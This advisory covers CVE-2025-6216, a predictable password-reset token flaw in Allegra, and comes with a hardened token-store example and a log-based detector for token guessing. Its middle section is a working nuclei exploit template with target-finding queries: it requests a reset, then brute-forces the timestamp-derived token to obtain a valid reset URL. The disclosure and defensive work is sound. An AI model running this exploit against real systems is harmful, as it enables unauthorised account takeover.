Allegra calculateTokenExpDate Password Recovery Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the password recovery mechanism. The issue results from reliance upon a predictable value when generating a password reset token. An attacker can leverage this vulnerability to bypass authentication on the application.
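The root cause described above is a reset token derived from a timestamp, so its only unknown part is a few bits of clock resolution. The following added example (not Allegra's code; every class and function name is an assumption chosen for illustration) places the timestamp-derived pattern beside a hardened issuance/redemption routine: a CSPRNG token, only its hash stored server-side, an expiry, and single use.

```python
import hashlib
import secrets
import time

# Lifetime of a reset link; 8 h matches the 28800000 ms used in the advisory's PoC.
TOKEN_LIFETIME_S = 8 * 60 * 60


def weak_token(issue_time_ms: int) -> str:
    """The flawed pattern: token = SHA-256 of the expiry timestamp.

    Deterministic: two issuances at the same millisecond yield the same token,
    and anyone who knows the issue time to the second has at most 1000 candidates.
    """
    expiry_ms = issue_time_ms + TOKEN_LIFETIME_S * 1000
    return hashlib.sha256(str(expiry_ms).encode()).hexdigest()


class ResetTokenStore:
    """Hypothetical server-side store for password-reset tokens (illustrative only)."""

    def __init__(self, now=time.time):
        self._now = now                 # injectable clock so expiry can be tested
        self._pending = {}              # sha256(token) -> (email, expires_at)

    def issue(self, email: str) -> str:
        # 32 bytes from the OS CSPRNG: 256 bits of entropy, unrelated to any clock or header.
        token = secrets.token_urlsafe(32)
        # Store only a digest: a database leak must not hand out usable reset links.
        digest = hashlib.sha256(token.encode()).hexdigest()
        self._pending[digest] = (email, self._now() + TOKEN_LIFETIME_S)
        return token

    def redeem(self, token: str):
        """Return the account e-mail if the token is valid, else None.

        A token is consumed on first use and rejected after its expiry.
        """
        digest = hashlib.sha256(token.encode()).hexdigest()
        entry = self._pending.pop(digest, None)   # pop: single use, valid or not
        if entry is None:
            return None
        email, expires_at = entry
        if self._now() > expires_at:
            return None
        return email


if __name__ == "__main__":
    # Constructed demonstration: the weak token repeats, the hardened one does not.
    print(weak_token(1750669432104) == weak_token(1750669432104))   # True
    store = ResetTokenStore()
    print(store.issue("user@example.test") != store.issue("user@example.test"))  # True
```

The lookup keyed by digest is sufficient here because the token itself carries 256 bits of entropy; the fix is in the source of randomness, not in the comparison.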
PoC code [public]
id: CVE-2025-6216

info:
  name: Allegra - Authentication Bypass via Predictable Password Reset Token
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Allegra calculateTokenExpDate Password Recovery Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the password recovery mechanism. The issue results from reliance upon a predictable value when generating a password reset token. An attacker can leverage this vulnerability to bypass authentication on the application.
  impact: |
    An attacker can exploit this vulnerability to bypass authentication and gain unauthorized access to the application, potentially compromising sensitive data and system integrity.
  remediation: |
    Upgrade Allegra to version 8.1.4 or 7.5.2 or later to fix the predictable password reset token vulnerability.
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-25-410/
    - https://alltena.com/en/resources/release-notes/release-notes-for-release-8-1-4-and-release-7-5-2
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6216
  classification:
    epss-score: 0.16633
    epss-percentile: 0.94688
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-6216
    cwe-id: CWE-640
    cpe: cpe:2.3:a:alltena:allegra:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: alltena
    product: allegra
    shodan-query: http.favicon.hash:"284403119"
    fofa-query: icon_hash="284403119"
  tags: cve,cve2025,allegra,auth-bypass,predictable-token,reset

variables:
  email: "admin@mydomainxxx.com" # Change to a test account

flow: http(1) && code()

http:
  - raw:
      - |
        POST /resetPassword.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        email={{email}}&fromAjax=true&_dc=1750669432104&perspectiveType=&appActionID=

    extractors:
      - type: regex
        name: date_header
        part: header
        internal: true
        group: 1
        regex:
          - "Date: (.*)"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "emailSent"
          - '"success":true'
        condition: and

      - type: status
        status:
          - 200

code:
  - engine:
      - py
      - python3 # requires python to be pre-installed on system running nuclei
    source: |
      import os
      import hashlib
      import requests
      from email.utils import parsedate_to_datetime

      def main():
          BASE_URL = os.getenv("BaseURL")
          EMAIL = os.getenv("email")
          # Date header of the reset response, extracted by the http step above
          date_header = os.getenv("date_header")
          if not date_header:
              return
          server_time = parsedate_to_datetime(date_header)
          server_time_ms = int(server_time.timestamp() * 1000)
          # the token is derived from the expiry time (issue time + 8 h); the Date
          # header gives that to the second, leaving only the millisecond part
          expiry_time_ms = server_time_ms + 28800000
          base_expiry_sec = (expiry_time_ms // 1000) * 1000
          for ms in range(1000):
              candidate_expiry_ms = base_expiry_sec + ms
              token = hashlib.sha256(str(candidate_expiry_ms).encode()).hexdigest()
              test_url = f"{BASE_URL}/resetPassword!confirm.action?ctk={token}"
              r = requests.get(test_url, allow_redirects=False)
              if 'com.trackplus.app.logon.ResetPasswordApplication' in r.text:
                  print(test_url)
                  return

      if __name__ == "__main__":
          main()

    matchers:
      - type: dsl
        dsl:
          - contains(code_response, "/resetPassword!confirm.action?ctk=")

    extractors:
      - type: dsl # type of the extractor
        dsl:
          - '"Reset URL: " + code_response'
# digest: 490a0046304402200a2dbd1ebf25b9e92750ff1d3e50589cd3834c4ae4e0f4567e0e280a8b882f9602203ee81b87653d7d775935569c3698904de2974ca45085d932957f0da0dbaab454:922c64590222798bb761d5b6d8e72950
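Because exploitation of this template's technique means one client walking through up to a thousand `ctk` values against `/resetPassword!confirm.action` in a short time, the pattern is visible in ordinary web-server access logs. The following added detection example (not part of the template or of Allegra; the log lines are constructed and the threshold and window are assumptions) parses combined-log-format lines and flags any source address that presents many distinct `ctk` values within a sliding window.

```python
import hashlib
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [ts] "METHOD path HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The reset-confirmation endpoint with its 64-hex-char token parameter
CTK_RE = re.compile(r'/resetPassword!confirm\.action\?(?:[^ ]*&)?ctk=([0-9a-f]{64})')


def parse_line(line):
    """Return (ip, timestamp, token, status) for a reset-confirm request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    c = CTK_RE.search(m["path"])
    if not c:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, c.group(1), int(m["status"])


def find_token_guessing(lines, threshold=20, window=timedelta(minutes=5)):
    """Flag each source IP that sends >= threshold distinct ctk values within `window`.

    A legitimate user clicks one link; a guessing client cycles through many tokens.
    """
    events = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ip, ts, token, _status = parsed
            events[ip].append((ts, token))

    alerts = []
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for i, (ts, _token) in enumerate(evs):
            while evs[start][0] < ts - window:      # slide the window's left edge
                start += 1
            distinct = {t for _, t in evs[start : i + 1]}
            if len(distinct) >= threshold:
                alerts.append({
                    "ip": ip,
                    "distinct_tokens": len(distinct),
                    "first": evs[start][0],
                    "last": ts,
                })
                break                               # one alert per source is enough
    return alerts


def _fake_token(i):
    # Constructed 64-hex token, only so the sample log has plausible-looking values
    return hashlib.sha256(f"constructed-{i}".encode()).hexdigest()


# Constructed sample: one source walks through 25 distinct tokens in 25 seconds,
# a second source follows a single link, and one unrelated request is mixed in.
SAMPLE_LOG = [
    f'203.0.113.7 - - [21/Jun/2025:10:15:{i:02d} +0000] '
    f'"GET /resetPassword!confirm.action?ctk={_fake_token(i)} HTTP/1.1" 302 0'
    for i in range(25)
] + [
    '198.51.100.4 - - [21/Jun/2025:10:16:40 +0000] '
    f'"GET /resetPassword!confirm.action?ctk={_fake_token(999)} HTTP/1.1" 200 4123',
    '198.51.100.4 - - [21/Jun/2025:10:16:41 +0000] "GET /favicon.ico HTTP/1.1" 200 1150',
]


if __name__ == "__main__":
    for alert in find_token_guessing(SAMPLE_LOG):
        print(alert)
```

The threshold of 20 distinct tokens in five minutes is deliberately far below the 1000 candidates the weak scheme allows, so even a rate-limited walk is caught early; tune both values to the reset volume the deployment actually sees.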